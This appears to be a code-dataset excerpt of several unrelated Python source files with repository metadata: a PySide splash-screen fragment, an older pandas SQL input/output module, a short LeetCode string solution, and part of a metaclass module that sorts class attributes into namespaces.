" background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0, stop:0 rgba(210, 157, 255, 255), stop:1 rgba(156, 69, 255, 255));\n"
"}")
self.progressBar.setValue(24)
self.verticalLayout.addWidget(self.frame)
Splash_Screen.setCentralWidget(self.centralwidget)
self.retranslateUi(Splash_Screen)
QMetaObject.connectSlotsByName(Splash_Screen)
# setupUi
def retranslateUi(self, Splash_Screen):
Splash_Screen.setWindowTitle(QCoreApplication.translate("Splash_Screen", u"MainWindow", None))
self.label.setText("")
# retranslateUi
| 2.203125 | 2 |
pandas/io/sql.py | danbirken/pandas | 0 | 1134 | <gh_stars>0
"""
Collection of query wrappers / abstractions to both facilitate data
retrieval and to reduce dependency on DB-specific API.
"""
from __future__ import print_function, division
from datetime import datetime, date, timedelta
import warnings
import traceback
import itertools
import re
import numpy as np
import pandas.core.common as com
from pandas.compat import lzip, map, zip, raise_with_traceback, string_types
from pandas.core.api import DataFrame, Series
from pandas.core.base import PandasObject
from pandas.tseries.tools import to_datetime
class SQLAlchemyRequired(ImportError):
pass
class DatabaseError(IOError):
pass
#------------------------------------------------------------------------------
# Helper functions
def _convert_params(sql, params):
"""convert sql and params args to DBAPI2.0 compliant format"""
args = [sql]
if params is not None:
if hasattr(params, 'keys'): # test if params is a mapping
args += [params]
else:
args += [list(params)]
return args
def _handle_date_column(col, format=None):
if isinstance(format, dict):
return to_datetime(col, **format)
else:
if format in ['D', 's', 'ms', 'us', 'ns']:
return to_datetime(col, coerce=True, unit=format)
elif issubclass(col.dtype.type, np.floating) or issubclass(col.dtype.type, np.integer):
# parse dates as timestamp
format = 's' if format is None else format
return to_datetime(col, coerce=True, unit=format)
else:
return to_datetime(col, coerce=True, format=format)
def _parse_date_columns(data_frame, parse_dates):
""" Force non-datetime columns to be read as such.
Supports both string formatted and integer timestamp columns
"""
# handle non-list entries for parse_dates gracefully
if parse_dates is True or parse_dates is None or parse_dates is False:
parse_dates = []
if not hasattr(parse_dates, '__iter__'):
parse_dates = [parse_dates]
for col_name in parse_dates:
df_col = data_frame[col_name]
try:
fmt = parse_dates[col_name]
except TypeError:
fmt = None
data_frame[col_name] = _handle_date_column(df_col, format=fmt)
return data_frame
def execute(sql, con, cur=None, params=None):
"""
Execute the given SQL query using the provided connection object.
Parameters
----------
sql : string
Query to be executed
con : SQLAlchemy engine or sqlite3 DBAPI2 connection
Using SQLAlchemy makes it possible to use any DB supported by that
library.
If a DBAPI2 object, only sqlite3 is supported.
cur : depreciated, cursor is obtained from connection
params : list or tuple, optional
List of parameters to pass to execute method.
Returns
-------
Results Iterable
"""
if cur is None:
pandas_sql = pandasSQL_builder(con)
else:
pandas_sql = pandasSQL_builder(cur, is_cursor=True)
args = _convert_params(sql, params)
return pandas_sql.execute(*args)
#------------------------------------------------------------------------------
#--- Deprecated tquery and uquery
def _safe_fetch(cur):
try:
result = cur.fetchall()
if not isinstance(result, list):
result = list(result)
return result
except Exception as e: # pragma: no cover
excName = e.__class__.__name__
if excName == 'OperationalError':
return []
def tquery(sql, con=None, cur=None, retry=True):
"""
DEPRECATED. Returns list of tuples corresponding to each row in given sql
query.
If only one column selected, then plain list is returned.
To obtain the same result in the future, you can use the following:
>>> execute(sql, con, params).fetchall()
Parameters
----------
sql: string
SQL query to be executed
con: DBAPI2 connection
cur: depreciated, cursor is obtained from connection
Returns
-------
Results Iterable
"""
warnings.warn(
"tquery is depreciated, and will be removed in future versions. "
"You can use ``execute(...).fetchall()`` instead.",
FutureWarning)
cur = execute(sql, con, cur=cur)
result = _safe_fetch(cur)
if con is not None:
try:
cur.close()
con.commit()
except Exception as e:
excName = e.__class__.__name__
if excName == 'OperationalError': # pragma: no cover
print('Failed to commit, may need to restart interpreter')
else:
raise
traceback.print_exc()
if retry:
return tquery(sql, con=con, retry=False)
if result and len(result[0]) == 1:
# python 3 compat
result = list(lzip(*result)[0])
elif result is None: # pragma: no cover
result = []
return result
def uquery(sql, con=None, cur=None, retry=True, params=None):
"""
DEPRECATED. Does the same thing as tquery, but instead of returning results, it
returns the number of rows affected. Good for update queries.
To obtain the same result in the future, you can use the following:
>>> execute(sql, con).rowcount
Parameters
----------
sql: string
SQL query to be executed
con: DBAPI2 connection
cur: depreciated, cursor is obtained from connection
params: list or tuple, optional
List of parameters to pass to execute method.
Returns
-------
Number of affected rows
"""
warnings.warn(
"uquery is depreciated, and will be removed in future versions. "
"You can use ``execute(...).rowcount`` instead.",
FutureWarning)
cur = execute(sql, con, cur=cur, params=params)
result = cur.rowcount
try:
con.commit()
except Exception as e:
excName = e.__class__.__name__
if excName != 'OperationalError':
raise
traceback.print_exc()
if retry:
print('Looks like your connection failed, reconnecting...')
return uquery(sql, con, retry=False)
return result
#------------------------------------------------------------------------------
#--- Read and write to DataFrames
def read_sql_table(table_name, con, index_col=None, coerce_float=True,
parse_dates=None, columns=None):
"""Read SQL database table into a DataFrame.
Given a table name and an SQLAlchemy engine, returns a DataFrame.
This function does not support DBAPI connections.
Parameters
----------
table_name : string
Name of SQL table in database
con : SQLAlchemy engine
Sqlite DBAPI conncection mode not supported
index_col : string, optional
Column to set as index
coerce_float : boolean, default True
Attempt to convert values to non-string, non-numeric objects (like
decimal.Decimal) to floating point. Can result in loss of Precision.
parse_dates : list or dict
- List of column names to parse as dates
- Dict of ``{column_name: format string}`` where format string is
strftime compatible in case of parsing string times or is one of
(D, s, ns, ms, us) in case of parsing integer timestamps
- Dict of ``{column_name: arg dict}``, where the arg dict corresponds
to the keyword arguments of :func:`pandas.to_datetime`
Especially useful with databases without native Datetime support,
such as SQLite
columns : list
List of column names to select from sql table
Returns
-------
DataFrame
See also
--------
read_sql_query : Read SQL query into a DataFrame.
read_sql
"""
pandas_sql = PandasSQLAlchemy(con)
table = pandas_sql.read_table(
table_name, index_col=index_col, coerce_float=coerce_float,
parse_dates=parse_dates, columns=columns)
if table is not None:
return table
else:
raise ValueError("Table %s not found" % table_name, con)
def read_sql_query(sql, con, index_col=None, coerce_float=True, params=None,
parse_dates=None):
"""Read SQL query into a DataFrame.
Returns a DataFrame corresponding to the result set of the query
string. Optionally provide an `index_col` parameter to use one of the
columns as the index, otherwise default integer index will be used.
Parameters
----------
sql : string
SQL query to be executed
con : SQLAlchemy engine or sqlite3 DBAPI2 connection
Using SQLAlchemy makes it possible to use any DB supported by that
library.
If a DBAPI2 object, only sqlite3 is supported.
index_col : string, optional
Column name to use as index for the returned DataFrame object.
coerce_float : boolean, default True
Attempt to convert values to non-string, non-numeric objects (like
decimal.Decimal) to floating point, useful for SQL result sets
params : list, tuple or dict, optional
List of parameters to pass to execute method.
parse_dates : list or dict
- List of column names to parse as dates
- Dict of ``{column_name: format string}`` where format string is
strftime compatible in case of parsing string times or is one of
(D, s, ns, ms, us) in case of parsing integer timestamps
- Dict of ``{column_name: arg dict}``, where the arg dict corresponds
to the keyword arguments of :func:`pandas.to_datetime`
Especially useful with databases without native Datetime support,
such as SQLite
Returns
-------
DataFrame
See also
--------
read_sql_table : Read SQL database table into a DataFrame
read_sql
"""
pandas_sql = pandasSQL_builder(con)
return pandas_sql.read_sql(
sql, index_col=index_col, params=params, coerce_float=coerce_float,
parse_dates=parse_dates)
def read_sql(sql, con, index_col=None, coerce_float=True, params=None,
parse_dates=None, columns=None):
"""
Read SQL query or database table into a DataFrame.
Parameters
----------
sql : string
SQL query to be executed or database table name.
con : SQLAlchemy engine or DBAPI2 connection (legacy mode)
Using SQLAlchemy makes it possible to use any DB supported by that
library.
If a DBAPI2 object, only sqlite3 is supported.
index_col : string, optional
column name to use as index for the returned DataFrame object.
coerce_float : boolean, default True
Attempt to convert values to non-string, non-numeric objects (like
decimal.Decimal) to floating point, useful for SQL result sets
params : list, tuple or dict, optional
List of parameters to pass to execute method.
parse_dates : list or dict
- List of column names to parse as dates
- Dict of ``{column_name: format string}`` where format string is
strftime compatible in case of parsing string times or is one of
(D, s, ns, ms, us) in case of parsing integer timestamps
- Dict of ``{column_name: arg dict}``, where the arg dict corresponds
to the keyword arguments of :func:`pandas.to_datetime`
Especially useful with databases without native Datetime support,
such as SQLite
columns : list
List of column names to select from sql table (only used when reading
a table).
Returns
-------
DataFrame
Notes
-----
This function is a convenience wrapper around ``read_sql_table`` and
``read_sql_query`` (and for backward compatibility) and will delegate
to the specific function depending on the provided input (database
table name or sql query).
See also
--------
read_sql_table : Read SQL database table into a DataFrame
read_sql_query : Read SQL query into a DataFrame
"""
pandas_sql = pandasSQL_builder(con)
if isinstance(pandas_sql, PandasSQLLegacy):
return pandas_sql.read_sql(
sql, index_col=index_col, params=params,
coerce_float=coerce_float, parse_dates=parse_dates)
if pandas_sql.has_table(sql):
return pandas_sql.read_table(
sql, index_col=index_col, coerce_float=coerce_float,
parse_dates=parse_dates, columns=columns)
else:
return pandas_sql.read_sql(
sql, index_col=index_col, params=params,
coerce_float=coerce_float, parse_dates=parse_dates)
def to_sql(frame, name, con, flavor='sqlite', if_exists='fail', index=True,
index_label=None):
"""
Write records stored in a DataFrame to a SQL database.
Parameters
----------
frame : DataFrame
name : string
Name of SQL table
con : SQLAlchemy engine or sqlite3 DBAPI2 connection
Using SQLAlchemy makes it possible to use any DB supported by that
library.
If a DBAPI2 object, only sqlite3 is supported.
flavor : {'sqlite', 'mysql'}, default 'sqlite'
The flavor of SQL to use. Ignored when using SQLAlchemy engine.
'mysql' is deprecated and will be removed in future versions, but it
will be further supported through SQLAlchemy engines.
if_exists : {'fail', 'replace', 'append'}, default 'fail'
- fail: If table exists, do nothing.
- replace: If table exists, drop it, recreate it, and insert data.
- append: If table exists, insert data. Create if does not exist.
index : boolean, default True
Write DataFrame index as a column
index_label : string or sequence, default None
Column label for index column(s). If None is given (default) and
`index` is True, then the index names are used.
A sequence should be given if the DataFrame uses MultiIndex.
"""
if if_exists not in ('fail', 'replace', 'append'):
raise ValueError("'{0}' is not valid for if_exists".format(if_exists))
pandas_sql = pandasSQL_builder(con, flavor=flavor)
if isinstance(frame, Series):
frame = frame.to_frame()
elif not isinstance(frame, DataFrame):
raise NotImplementedError
pandas_sql.to_sql(frame, name, if_exists=if_exists, index=index,
index_label=index_label)
def has_table(table_name, con, flavor='sqlite'):
"""
Check if DataBase has named table.
Parameters
----------
table_name: string
Name of SQL table
con: SQLAlchemy engine or sqlite3 DBAPI2 connection
Using SQLAlchemy makes it possible to use any DB supported by that
library.
If a DBAPI2 object, only sqlite3 is supported.
flavor: {'sqlite', 'mysql'}, default 'sqlite'
The flavor of SQL to use. Ignored when using SQLAlchemy engine.
'mysql' is deprecated and will be removed in future versions, but it
will be further supported through SQLAlchemy engines.
Returns
-------
boolean
"""
pandas_sql = pandasSQL_builder(con, flavor=flavor)
return pandas_sql.has_table(table_name)
table_exists = has_table
_MYSQL_WARNING = ("The 'mysql' flavor with DBAPI connection is deprecated "
"and will be removed in future versions. "
"MySQL will be further supported with SQLAlchemy engines.")
def pandasSQL_builder(con, flavor=None, meta=None, is_cursor=False):
"""
Convenience function to return the correct PandasSQL subclass based on the
provided parameters
"""
# When support for DBAPI connections is removed,
# is_cursor should not be necessary.
try:
import sqlalchemy
if isinstance(con, sqlalchemy.engine.Engine):
return PandasSQLAlchemy(con, meta=meta)
else:
if flavor == 'mysql':
warnings.warn(_MYSQL_WARNING, FutureWarning)
return PandasSQLLegacy(con, flavor, is_cursor=is_cursor)
except ImportError:
if flavor == 'mysql':
warnings.warn(_MYSQL_WARNING, FutureWarning)
return PandasSQLLegacy(con, flavor, is_cursor=is_cursor)
class PandasSQLTable(PandasObject):
"""
For mapping Pandas tables to SQL tables.
Uses fact that table is reflected by SQLAlchemy to
do better type convertions.
Also holds various flags needed to avoid having to
pass them between functions all the time.
"""
# TODO: support for multiIndex
def __init__(self, name, pandas_sql_engine, frame=None, index=True,
if_exists='fail', prefix='pandas', index_label=None):
self.name = name
self.pd_sql = pandas_sql_engine
self.prefix = prefix
self.frame = frame
self.index = self._index_name(index, index_label)
if frame is not None:
# We want to write a frame
if self.pd_sql.has_table(self.name):
if if_exists == 'fail':
raise ValueError("Table '%s' already exists." % name)
elif if_exists == 'replace':
self.pd_sql.drop_table(self.name)
self.table = self._create_table_statement()
self.create()
elif if_exists == 'append':
self.table = self.pd_sql.get_table(self.name)
if self.table is None:
self.table = self._create_table_statement()
else:
raise ValueError(
"'{0}' is not valid for if_exists".format(if_exists))
else:
self.table = self._create_table_statement()
self.create()
else:
# no data provided, read-only mode
self.table = self.pd_sql.get_table(self.name)
if self.table is None:
raise ValueError("Could not init table '%s'" % name)
def exists(self):
return self.pd_sql.has_table(self.name)
def sql_schema(self):
from sqlalchemy.schema import CreateTable
return str(CreateTable(self.table))
def create(self):
self.table.create()
def insert_statement(self):
return self.table.insert()
def maybe_asscalar(self, i):
try:
return np.asscalar(i)
except AttributeError:
return i
def insert_data(self):
if self.index is not None:
temp = self.frame.copy()
temp.index.names = self.index
try:
temp.reset_index(inplace=True)
except ValueError as err:
raise ValueError(
"duplicate name in index/columns: {0}".format(err))
else:
temp = self.frame
return temp
def insert(self):
ins = self.insert_statement()
data_list = []
temp = self.insert_data()
keys = temp.columns
for t in temp.itertuples():
data = dict((k, self.maybe_asscalar(v))
for k, v in zip(keys, t[1:]))
data_list.append(data)
self.pd_sql.execute(ins, data_list)
def read(self, coerce_float=True, parse_dates=None, columns=None):
if columns is not None and len(columns) > 0:
from sqlalchemy import select
cols = [self.table.c[n] for n in columns]
if self.index is not None:
[cols.insert(0, self.table.c[idx]) for idx in self.index[::-1]]
sql_select = select(cols)
else:
sql_select = self.table.select()
result = self.pd_sql.execute(sql_select)
data = result.fetchall()
column_names = result.keys()
self.frame = DataFrame.from_records(
data, columns=column_names, coerce_float=coerce_float)
self._harmonize_columns(parse_dates=parse_dates)
if self.index is not None:
self.frame.set_index(self.index, inplace=True)
return self.frame
def _index_name(self, index, index_label):
# for writing: index=True to include index in sql table
if index is True:
nlevels = self.frame.index.nlevels
# if index_label is specified, set this as index name(s)
if index_label is not None:
if not isinstance(index_label, list):
index_label = [index_label]
if len(index_label) != nlevels:
raise ValueError(
"Length of 'index_label' should match number of "
"levels, which is {0}".format(nlevels))
else:
return index_label
# return the used column labels for the index columns
if nlevels == 1 and 'index' not in self.frame.columns and self.frame.index.name is None:
return ['index']
else:
return [l if l is not None else "level_{0}".format(i)
for i, l in enumerate(self.frame.index.names)]
# for reading: index=(list of) string to specify column to set as index
elif isinstance(index, string_types):
return [index]
elif isinstance(index, list):
return index
else:
return None
def _create_table_statement(self):
from sqlalchemy import Table, Column
columns = list(map(str, self.frame.columns))
column_types = map(self._sqlalchemy_type, self.frame.dtypes)
columns = [Column(name, typ)
for name, typ in zip(columns, column_types)]
if self.index is not None:
for i, idx_label in enumerate(self.index[::-1]):
idx_type = self._sqlalchemy_type(
self.frame.index.get_level_values(i))
columns.insert(0, Column(idx_label, idx_type, index=True))
return Table(self.name, self.pd_sql.meta, *columns)
def _harmonize_columns(self, parse_dates=None):
""" Make a data_frame's column type align with an sql_table
column types
Need to work around limited NA value support.
Floats are always fine, ints must always
be floats if there are Null values.
Booleans are hard because converting bool column with None replaces
all Nones with false. Therefore only convert bool if there are no
NA values.
Datetimes should already be converted
to np.datetime if supported, but here we also force conversion
if required
"""
# handle non-list entries for parse_dates gracefully
if parse_dates is True or parse_dates is None or parse_dates is False:
parse_dates = []
if not hasattr(parse_dates, '__iter__'):
parse_dates = [parse_dates]
for sql_col in self.table.columns:
col_name = sql_col.name
try:
df_col = self.frame[col_name]
# the type the dataframe column should have
col_type = self._numpy_type(sql_col.type)
if col_type is datetime or col_type is date:
if not issubclass(df_col.dtype.type, np.datetime64):
self.frame[col_name] = _handle_date_column(df_col)
elif col_type is float:
# floats support NA, can always convert!
self.frame[col_name].astype(col_type, copy=False)
elif len(df_col) == df_col.count():
# No NA values, can convert ints and bools
if col_type is int or col_type is bool:
self.frame[col_name].astype(col_type, copy=False)
# Handle date parsing
if col_name in parse_dates:
try:
fmt = parse_dates[col_name]
except TypeError:
fmt = None
self.frame[col_name] = _handle_date_column(
df_col, format=fmt)
except KeyError:
pass # this column not in results
def _sqlalchemy_type(self, arr_or_dtype):
from sqlalchemy.types import Integer, Float, Text, Boolean, DateTime, Date, Interval
if arr_or_dtype is date:
return Date
if com.is_datetime64_dtype(arr_or_dtype):
try:
tz = arr_or_dtype.tzinfo
return DateTime(timezone=True)
except:
return DateTime
if com.is_timedelta64_dtype(arr_or_dtype):
warnings.warn("the 'timedelta' type is not supported, and will be "
"written as integer values (ns frequency) to the "
"database.", UserWarning)
return Integer
elif com.is_float_dtype(arr_or_dtype):
return Float
elif com.is_integer_dtype(arr_or_dtype):
# TODO: Refine integer size.
return Integer
elif com.is_bool(arr_or_dtype):
return Boolean
return Text
def _numpy_type(self, sqltype):
from sqlalchemy.types import Integer, Float, Boolean, DateTime, Date
if isinstance(sqltype, Float):
return float
if isinstance(sqltype, Integer):
# TODO: Refine integer size.
return int
if isinstance(sqltype, DateTime):
# Caution: np.datetime64 is also a subclass of np.number.
return datetime
if isinstance(sqltype, Date):
return date
if isinstance(sqltype, Boolean):
return bool
return object
class PandasSQL(PandasObject):
"""
Subclasses Should define read_sql and to_sql
"""
def read_sql(self, *args, **kwargs):
raise ValueError(
"PandasSQL must be created with an SQLAlchemy engine or connection+sql flavor")
def to_sql(self, *args, **kwargs):
raise ValueError(
"PandasSQL must be created with an SQLAlchemy engine or connection+sql flavor")
class PandasSQLAlchemy(PandasSQL):
"""
This class enables convertion between DataFrame and SQL databases
using SQLAlchemy to handle DataBase abstraction
"""
def __init__(self, engine, meta=None):
self.engine = engine
if not meta:
from sqlalchemy.schema import MetaData
meta = MetaData(self.engine)
meta.reflect(self.engine)
self.meta = meta
def execute(self, *args, **kwargs):
"""Simple passthrough to SQLAlchemy engine"""
return self.engine.execute(*args, **kwargs)
def read_table(self, table_name, index_col=None, coerce_float=True,
parse_dates=None, columns=None):
table = PandasSQLTable(table_name, self, index=index_col)
return table.read(coerce_float=coerce_float,
parse_dates=parse_dates, columns=columns)
def read_sql(self, sql, index_col=None, coerce_float=True,
parse_dates=None, params=None):
args = _convert_params(sql, params)
result = self.execute(*args)
data = result.fetchall()
columns = result.keys()
data_frame = DataFrame.from_records(
data, columns=columns, coerce_float=coerce_float)
_parse_date_columns(data_frame, parse_dates)
if index_col is not None:
data_frame.set_index(index_col, inplace=True)
return data_frame
def to_sql(self, frame, name, if_exists='fail', index=True,
index_label=None):
table = PandasSQLTable(
name, self, frame=frame, index=index, if_exists=if_exists,
index_label=index_label)
table.insert()
@property
def tables(self):
return self.meta.tables
def has_table(self, name):
if self.meta.tables.get(name) is not None:
return True
else:
return False
def get_table(self, table_name):
return self.meta.tables.get(table_name)
def drop_table(self, table_name):
if self.engine.has_table(table_name):
self.get_table(table_name).drop()
self.meta.clear()
self.meta.reflect()
def _create_sql_schema(self, frame, table_name):
table = PandasSQLTable(table_name, self, frame=frame)
return str(table.sql_schema())
# ---- SQL without SQLAlchemy ---
# Flavour specific sql strings and handler class for access to DBs without
# SQLAlchemy installed
# SQL type convertions for each DB
_SQL_TYPES = {
'text': {
'mysql': 'VARCHAR (63)',
'sqlite': 'TEXT',
},
'float': {
'mysql': 'FLOAT',
'sqlite': 'REAL',
},
'int': {
'mysql': 'BIGINT',
'sqlite': 'INTEGER',
},
'datetime': {
'mysql': 'DATETIME',
'sqlite': 'TIMESTAMP',
},
'date': {
'mysql': 'DATE',
'sqlite': 'TIMESTAMP',
},
'bool': {
'mysql': 'BOOLEAN',
'sqlite': 'INTEGER',
}
}
# SQL enquote and wildcard symbols
_SQL_SYMB = {
'mysql': {
'br_l': '`',
'br_r': '`',
'wld': '%s'
},
'sqlite': {
'br_l': '[',
'br_r': ']',
'wld': '?'
}
}
_SAFE_NAMES_WARNING = ("The spaces in these column names will not be changed. "
"In pandas versions < 0.14, spaces were converted to "
"underscores.")
class PandasSQLTableLegacy(PandasSQLTable):
"""Patch the PandasSQLTable for legacy support.
Instead of a table variable just use the Create Table
statement"""
def sql_schema(self):
return str(self.table)
def create(self):
self.pd_sql.execute(self.table)
def insert_statement(self):
names = list(map(str, self.frame.columns))
flv = self.pd_sql.flavor
br_l = _SQL_SYMB[flv]['br_l'] # left val quote char
br_r = _SQL_SYMB[flv]['br_r'] # right val quote char
wld = _SQL_SYMB[flv]['wld'] # wildcard char
if self.index is not None:
[names.insert(0, idx) for idx in self.index[::-1]]
bracketed_names = [br_l + column + br_r for column in names]
col_names = ','.join(bracketed_names)
wildcards = ','.join([wld] * len(names))
insert_statement = 'INSERT INTO %s (%s) VALUES (%s)' % (
self.name, col_names, wildcards)
return insert_statement
def insert(self):
ins = self.insert_statement()
temp = self.insert_data()
data_list = []
for t in temp.itertuples():
data = tuple((self.maybe_asscalar(v) for v in t[1:]))
data_list.append(data)
cur = self.pd_sql.con.cursor()
cur.executemany(ins, data_list)
cur.close()
self.pd_sql.con.commit()
def _create_table_statement(self):
"Return a CREATE TABLE statement to suit the contents of a DataFrame."
columns = list(map(str, self.frame.columns))
pat = re.compile('\s+')
if any(map(pat.search, columns)):
warnings.warn(_SAFE_NAMES_WARNING)
column_types = [self._sql_type_name(typ) for typ in self.frame.dtypes]
if self.index is not None:
for i, idx_label in enumerate(self.index[::-1]):
columns.insert(0, idx_label)
column_types.insert(0, self._sql_type_name(self.frame.index.get_level_values(i).dtype))
flv = self.pd_sql.flavor
br_l = _SQL_SYMB[flv]['br_l'] # left val quote char
br_r = _SQL_SYMB[flv]['br_r'] # right val quote char
col_template = br_l + '%s' + br_r + ' %s'
columns = ',\n '.join(col_template %
x for x in zip(columns, column_types))
template = """CREATE TABLE %(name)s (
%(columns)s
)"""
create_statement = template % {'name': self.name, 'columns': columns}
return create_statement
def _sql_type_name(self, dtype):
pytype = dtype.type
pytype_name = "text"
if issubclass(pytype, np.floating):
pytype_name = "float"
elif com.is_timedelta64_dtype(pytype):
warnings.warn("the 'timedelta' type is not supported, and will be "
"written as integer values (ns frequency) to the "
"database.", UserWarning)
pytype_name = "int"
elif issubclass(pytype, np.integer):
pytype_name = "int"
elif issubclass(pytype, np.datetime64) or pytype is datetime:
# Caution: np.datetime64 is also a subclass of np.number.
pytype_name = "datetime"
elif pytype is datetime.date:
pytype_name = "date"
elif issubclass(pytype, np.bool_):
pytype_name = "bool"
return _SQL_TYPES[pytype_name][self.pd_sql.flavor]
class PandasSQLLegacy(PandasSQL):
def __init__(self, con, flavor, is_cursor=False):
self.is_cursor = is_cursor
self.con = con
if flavor is None:
flavor = 'sqlite'
if flavor not in ['sqlite', 'mysql']:
raise NotImplementedError
else:
self.flavor = flavor
def execute(self, *args, **kwargs):
if self.is_cursor:
cur = self.con
else:
cur = self.con.cursor()
try:
if kwargs:
cur.execute(*args, **kwargs)
else:
cur.execute(*args)
return cur
except Exception as e:
try:
self.con.rollback()
except Exception: # pragma: no cover
ex = DatabaseError(
"Execution failed on sql: %s\n%s\nunable to rollback" % (args[0], e))
raise_with_traceback(ex)
ex = DatabaseError("Execution failed on sql: %s" % args[0])
raise_with_traceback(ex)
def read_sql(self, sql, index_col=None, coerce_float=True, params=None,
parse_dates=None):
args = _convert_params(sql, params)
cursor = self.execute(*args)
columns = [col_desc[0] for col_desc in cursor.description]
data = self._fetchall_as_list(cursor)
cursor.close()
data_frame = DataFrame.from_records(
data, columns=columns, coerce_float=coerce_float)
_parse_date_columns(data_frame, parse_dates)
if index_col is not None:
data_frame.set_index(index_col, inplace=True)
return data_frame
def _fetchall_as_list(self, cur):
result = cur.fetchall()
if not isinstance(result, list):
result = list(result)
return result
def to_sql(self, frame, name, if_exists='fail', index=True,
index_label=None):
"""
Write records stored in a DataFrame to a SQL database.
Parameters
----------
frame: DataFrame
name: name of SQL table
flavor: {'sqlite', 'mysql'}, default 'sqlite'
if_exists: {'fail', 'replace', 'append'}, default 'fail'
fail: If table exists, do nothing.
replace: If table exists, drop it, recreate it, and insert data.
append: If table exists, insert data. Create if does not exist.
"""
table = PandasSQLTableLegacy(
name, self, frame=frame, index=index, if_exists=if_exists,
index_label=index_label)
table.insert()
def has_table(self, name):
flavor_map = {
'sqlite': ("SELECT name FROM sqlite_master "
"WHERE type='table' AND name='%s';") % name,
'mysql': "SHOW TABLES LIKE '%s'" % name}
query = flavor_map.get(self.flavor)
return len(self.execute(query).fetchall()) > 0
def get_table(self, table_name):
return None # not supported in Legacy mode
def drop_table(self, name):
drop_sql = "DROP TABLE %s" % name
self.execute(drop_sql)
def _create_sql_schema(self, frame, table_name):
table = PandasSQLTableLegacy(table_name, self, frame=frame)
return str(table.sql_schema())
def get_schema(frame, name, flavor='sqlite', keys=None, con=None):
"""
Get the SQL db table schema for the given frame.
Parameters
----------
frame : DataFrame
name : string
name of SQL table
flavor : {'sqlite', 'mysql'}, default 'sqlite'
The flavor of SQL to use. Ignored when using SQLAlchemy engine.
'mysql' is deprecated and will be removed in future versions, but it
will be further supported through SQLAlchemy engines.
keys : string or sequence
columns to use a primary key
con: an open SQL database connection object or an SQLAlchemy engine
Using SQLAlchemy makes it possible to use any DB supported by that
library.
If a DBAPI2 object, only sqlite3 is supported.
"""
if con is None:
if flavor == 'mysql':
warnings.warn(_MYSQL_WARNING, FutureWarning)
return _get_schema_legacy(frame, name, flavor, keys)
pandas_sql = pandasSQL_builder(con=con, flavor=flavor)
return pandas_sql._create_sql_schema(frame, name)
def _get_schema_legacy(frame, name, flavor, keys=None):
"""Old function from 0.13.1. To keep backwards compatibility.
When mysql legacy support is dropped, it should be possible to
remove this code
"""
def get_sqltype(dtype, flavor):
pytype = dtype.type
pytype_name = "text"
if issubclass(pytype, np.floating):
pytype_name = "float"
elif issubclass(pytype, np.integer):
pytype_name = "int"
elif issubclass(pytype, np.datetime64) or pytype is datetime:
# Caution: np.datetime64 is also a subclass of np.number.
pytype_name = "datetime"
elif pytype is datetime.date:
pytype_name = "date"
elif issubclass(pytype, np.bool_):
pytype_name = "bool"
return _SQL_TYPES[pytype_name][flavor]
lookup_type = lambda dtype: get_sqltype(dtype, flavor)
column_types = lzip(frame.dtypes.index, map(lookup_type, frame.dtypes))
if flavor == 'sqlite':
columns = ',\n '.join('[%s] %s' % x for x in column_types)
else:
columns = ',\n '.join('`%s` %s' % x for x in column_types)
keystr = ''
if keys is not None:
if isinstance(keys, string_types):
keys = (keys,)
keystr = ', PRIMARY KEY (%s)' % ','.join(keys)
template = """CREATE TABLE %(name)s (
%(columns)s
%(keystr)s
);"""
create_statement = template % {'name': name, 'columns': columns,
'keystr': keystr}
return create_statement
# legacy names, with depreciation warnings and copied docs
def read_frame(*args, **kwargs):
"""DEPRECIATED - use read_sql
"""
warnings.warn("read_frame is depreciated, use read_sql", FutureWarning)
return read_sql(*args, **kwargs)
def frame_query(*args, **kwargs):
"""DEPRECIATED - use read_sql
"""
warnings.warn("frame_query is depreciated, use read_sql", FutureWarning)
return read_sql(*args, **kwargs)
def write_frame(frame, name, con, flavor='sqlite', if_exists='fail', **kwargs):
"""DEPRECIATED - use to_sql
Write records stored in a DataFrame to a SQL database.
Parameters
----------
frame : DataFrame
name : string
con : DBAPI2 connection
flavor : {'sqlite', 'mysql'}, default 'sqlite'
The flavor of SQL to use.
if_exists : {'fail', 'replace', 'append'}, default 'fail'
- fail: If table exists, do nothing.
- replace: If table exists, drop it, recreate it, and insert data.
- append: If table exists, insert data. Create if does not exist.
index : boolean, default False
Write DataFrame index as a column
Notes
-----
This function is deprecated in favor of ``to_sql``. There are however
two differences:
- With ``to_sql`` the index is written to the sql database by default. To
keep the behaviour this function you need to specify ``index=False``.
- The new ``to_sql`` function supports sqlalchemy engines to work with
different sql flavors.
See also
--------
pandas.DataFrame.to_sql
"""
warnings.warn("write_frame is depreciated, use to_sql", FutureWarning)
# for backwards compatibility, set index=False when not specified
index = kwargs.pop('index', False)
return to_sql(frame, name, con, flavor=flavor, if_exists=if_exists,
index=index, **kwargs)
# Append wrapped function docstrings
read_frame.__doc__ += read_sql.__doc__
frame_query.__doc__ += read_sql.__doc__
| 2.5 | 2 |
Dataset/Leetcode/train/58/28.py | kkcookies99/UAST | 0 | 1135 | <filename>Dataset/Leetcode/train/58/28.py
class Solution:
def XXX(self, s):
"""
:type s: str
:rtype: int
"""
cnt, tail = 0, len(s) - 1
while tail >= 0 and s[tail] == ' ':
tail -= 1
while tail >= 0 and s[tail] != ' ':
cnt += 1
tail -= 1
return cnt
| 2.9375 | 3 |
Systerm/meta.py | ZytroCode/Systerm | 1 | 1136 | <gh_stars>1-10
"""Meta is a module contains objects that will customize the behavior of python."""
from abc import ABC
from abc import ABCMeta
from abc import abstractmethod
from typing import Any
from typing import Callable
import Systerm
# Metaclass
class Metaclass(ABCMeta):
"""A metaclass to customize the behavior of all classes."""
def __new__(self, name: str, bases: tuple[type, ...], attrs: dict[str, Any], **keys: Any) -> type:
"""The static constructor for the Metaclass.
Parameters:
name - str The name of the class
bases - tuple[type, ...] A tuple of classes to inherit
attrs - dict[str, Any] A dictionary of attributes
**keys - Any Keyword arguments to pass in
"""
# Creating a new class
cls = super().__new__(self, name, bases, dict(attrs), **keys)
cls.__setattr__ = self.setattr
# Custom magic methods
cls.__namespaces__ = {}
cls.__magics__ = {}
cls.__attributes__ = {}
cls.__publics__ = {}
cls.__privates__ = {}
cls.__protecteds__ = {}
# Setting objects
for name in dir(cls):
value = getattr(cls, name)
# Adds attributes to __magics__
if name.startswith("__") and name.endswith("__"):
cls.__magics__[name] = value
# Adds attributes to other namespace
else:
# Adds attributes to __privates__
if name.startswith("__"):
cls.__privates__[name] = value
# Adds attributes to __protecteds__
elif name.startswith("_"):
cls.__protecteds__[name] = value
# Adds attributes to __publics__
else:
cls.__publics__[name] = value
cls.__attributes__[name] = value
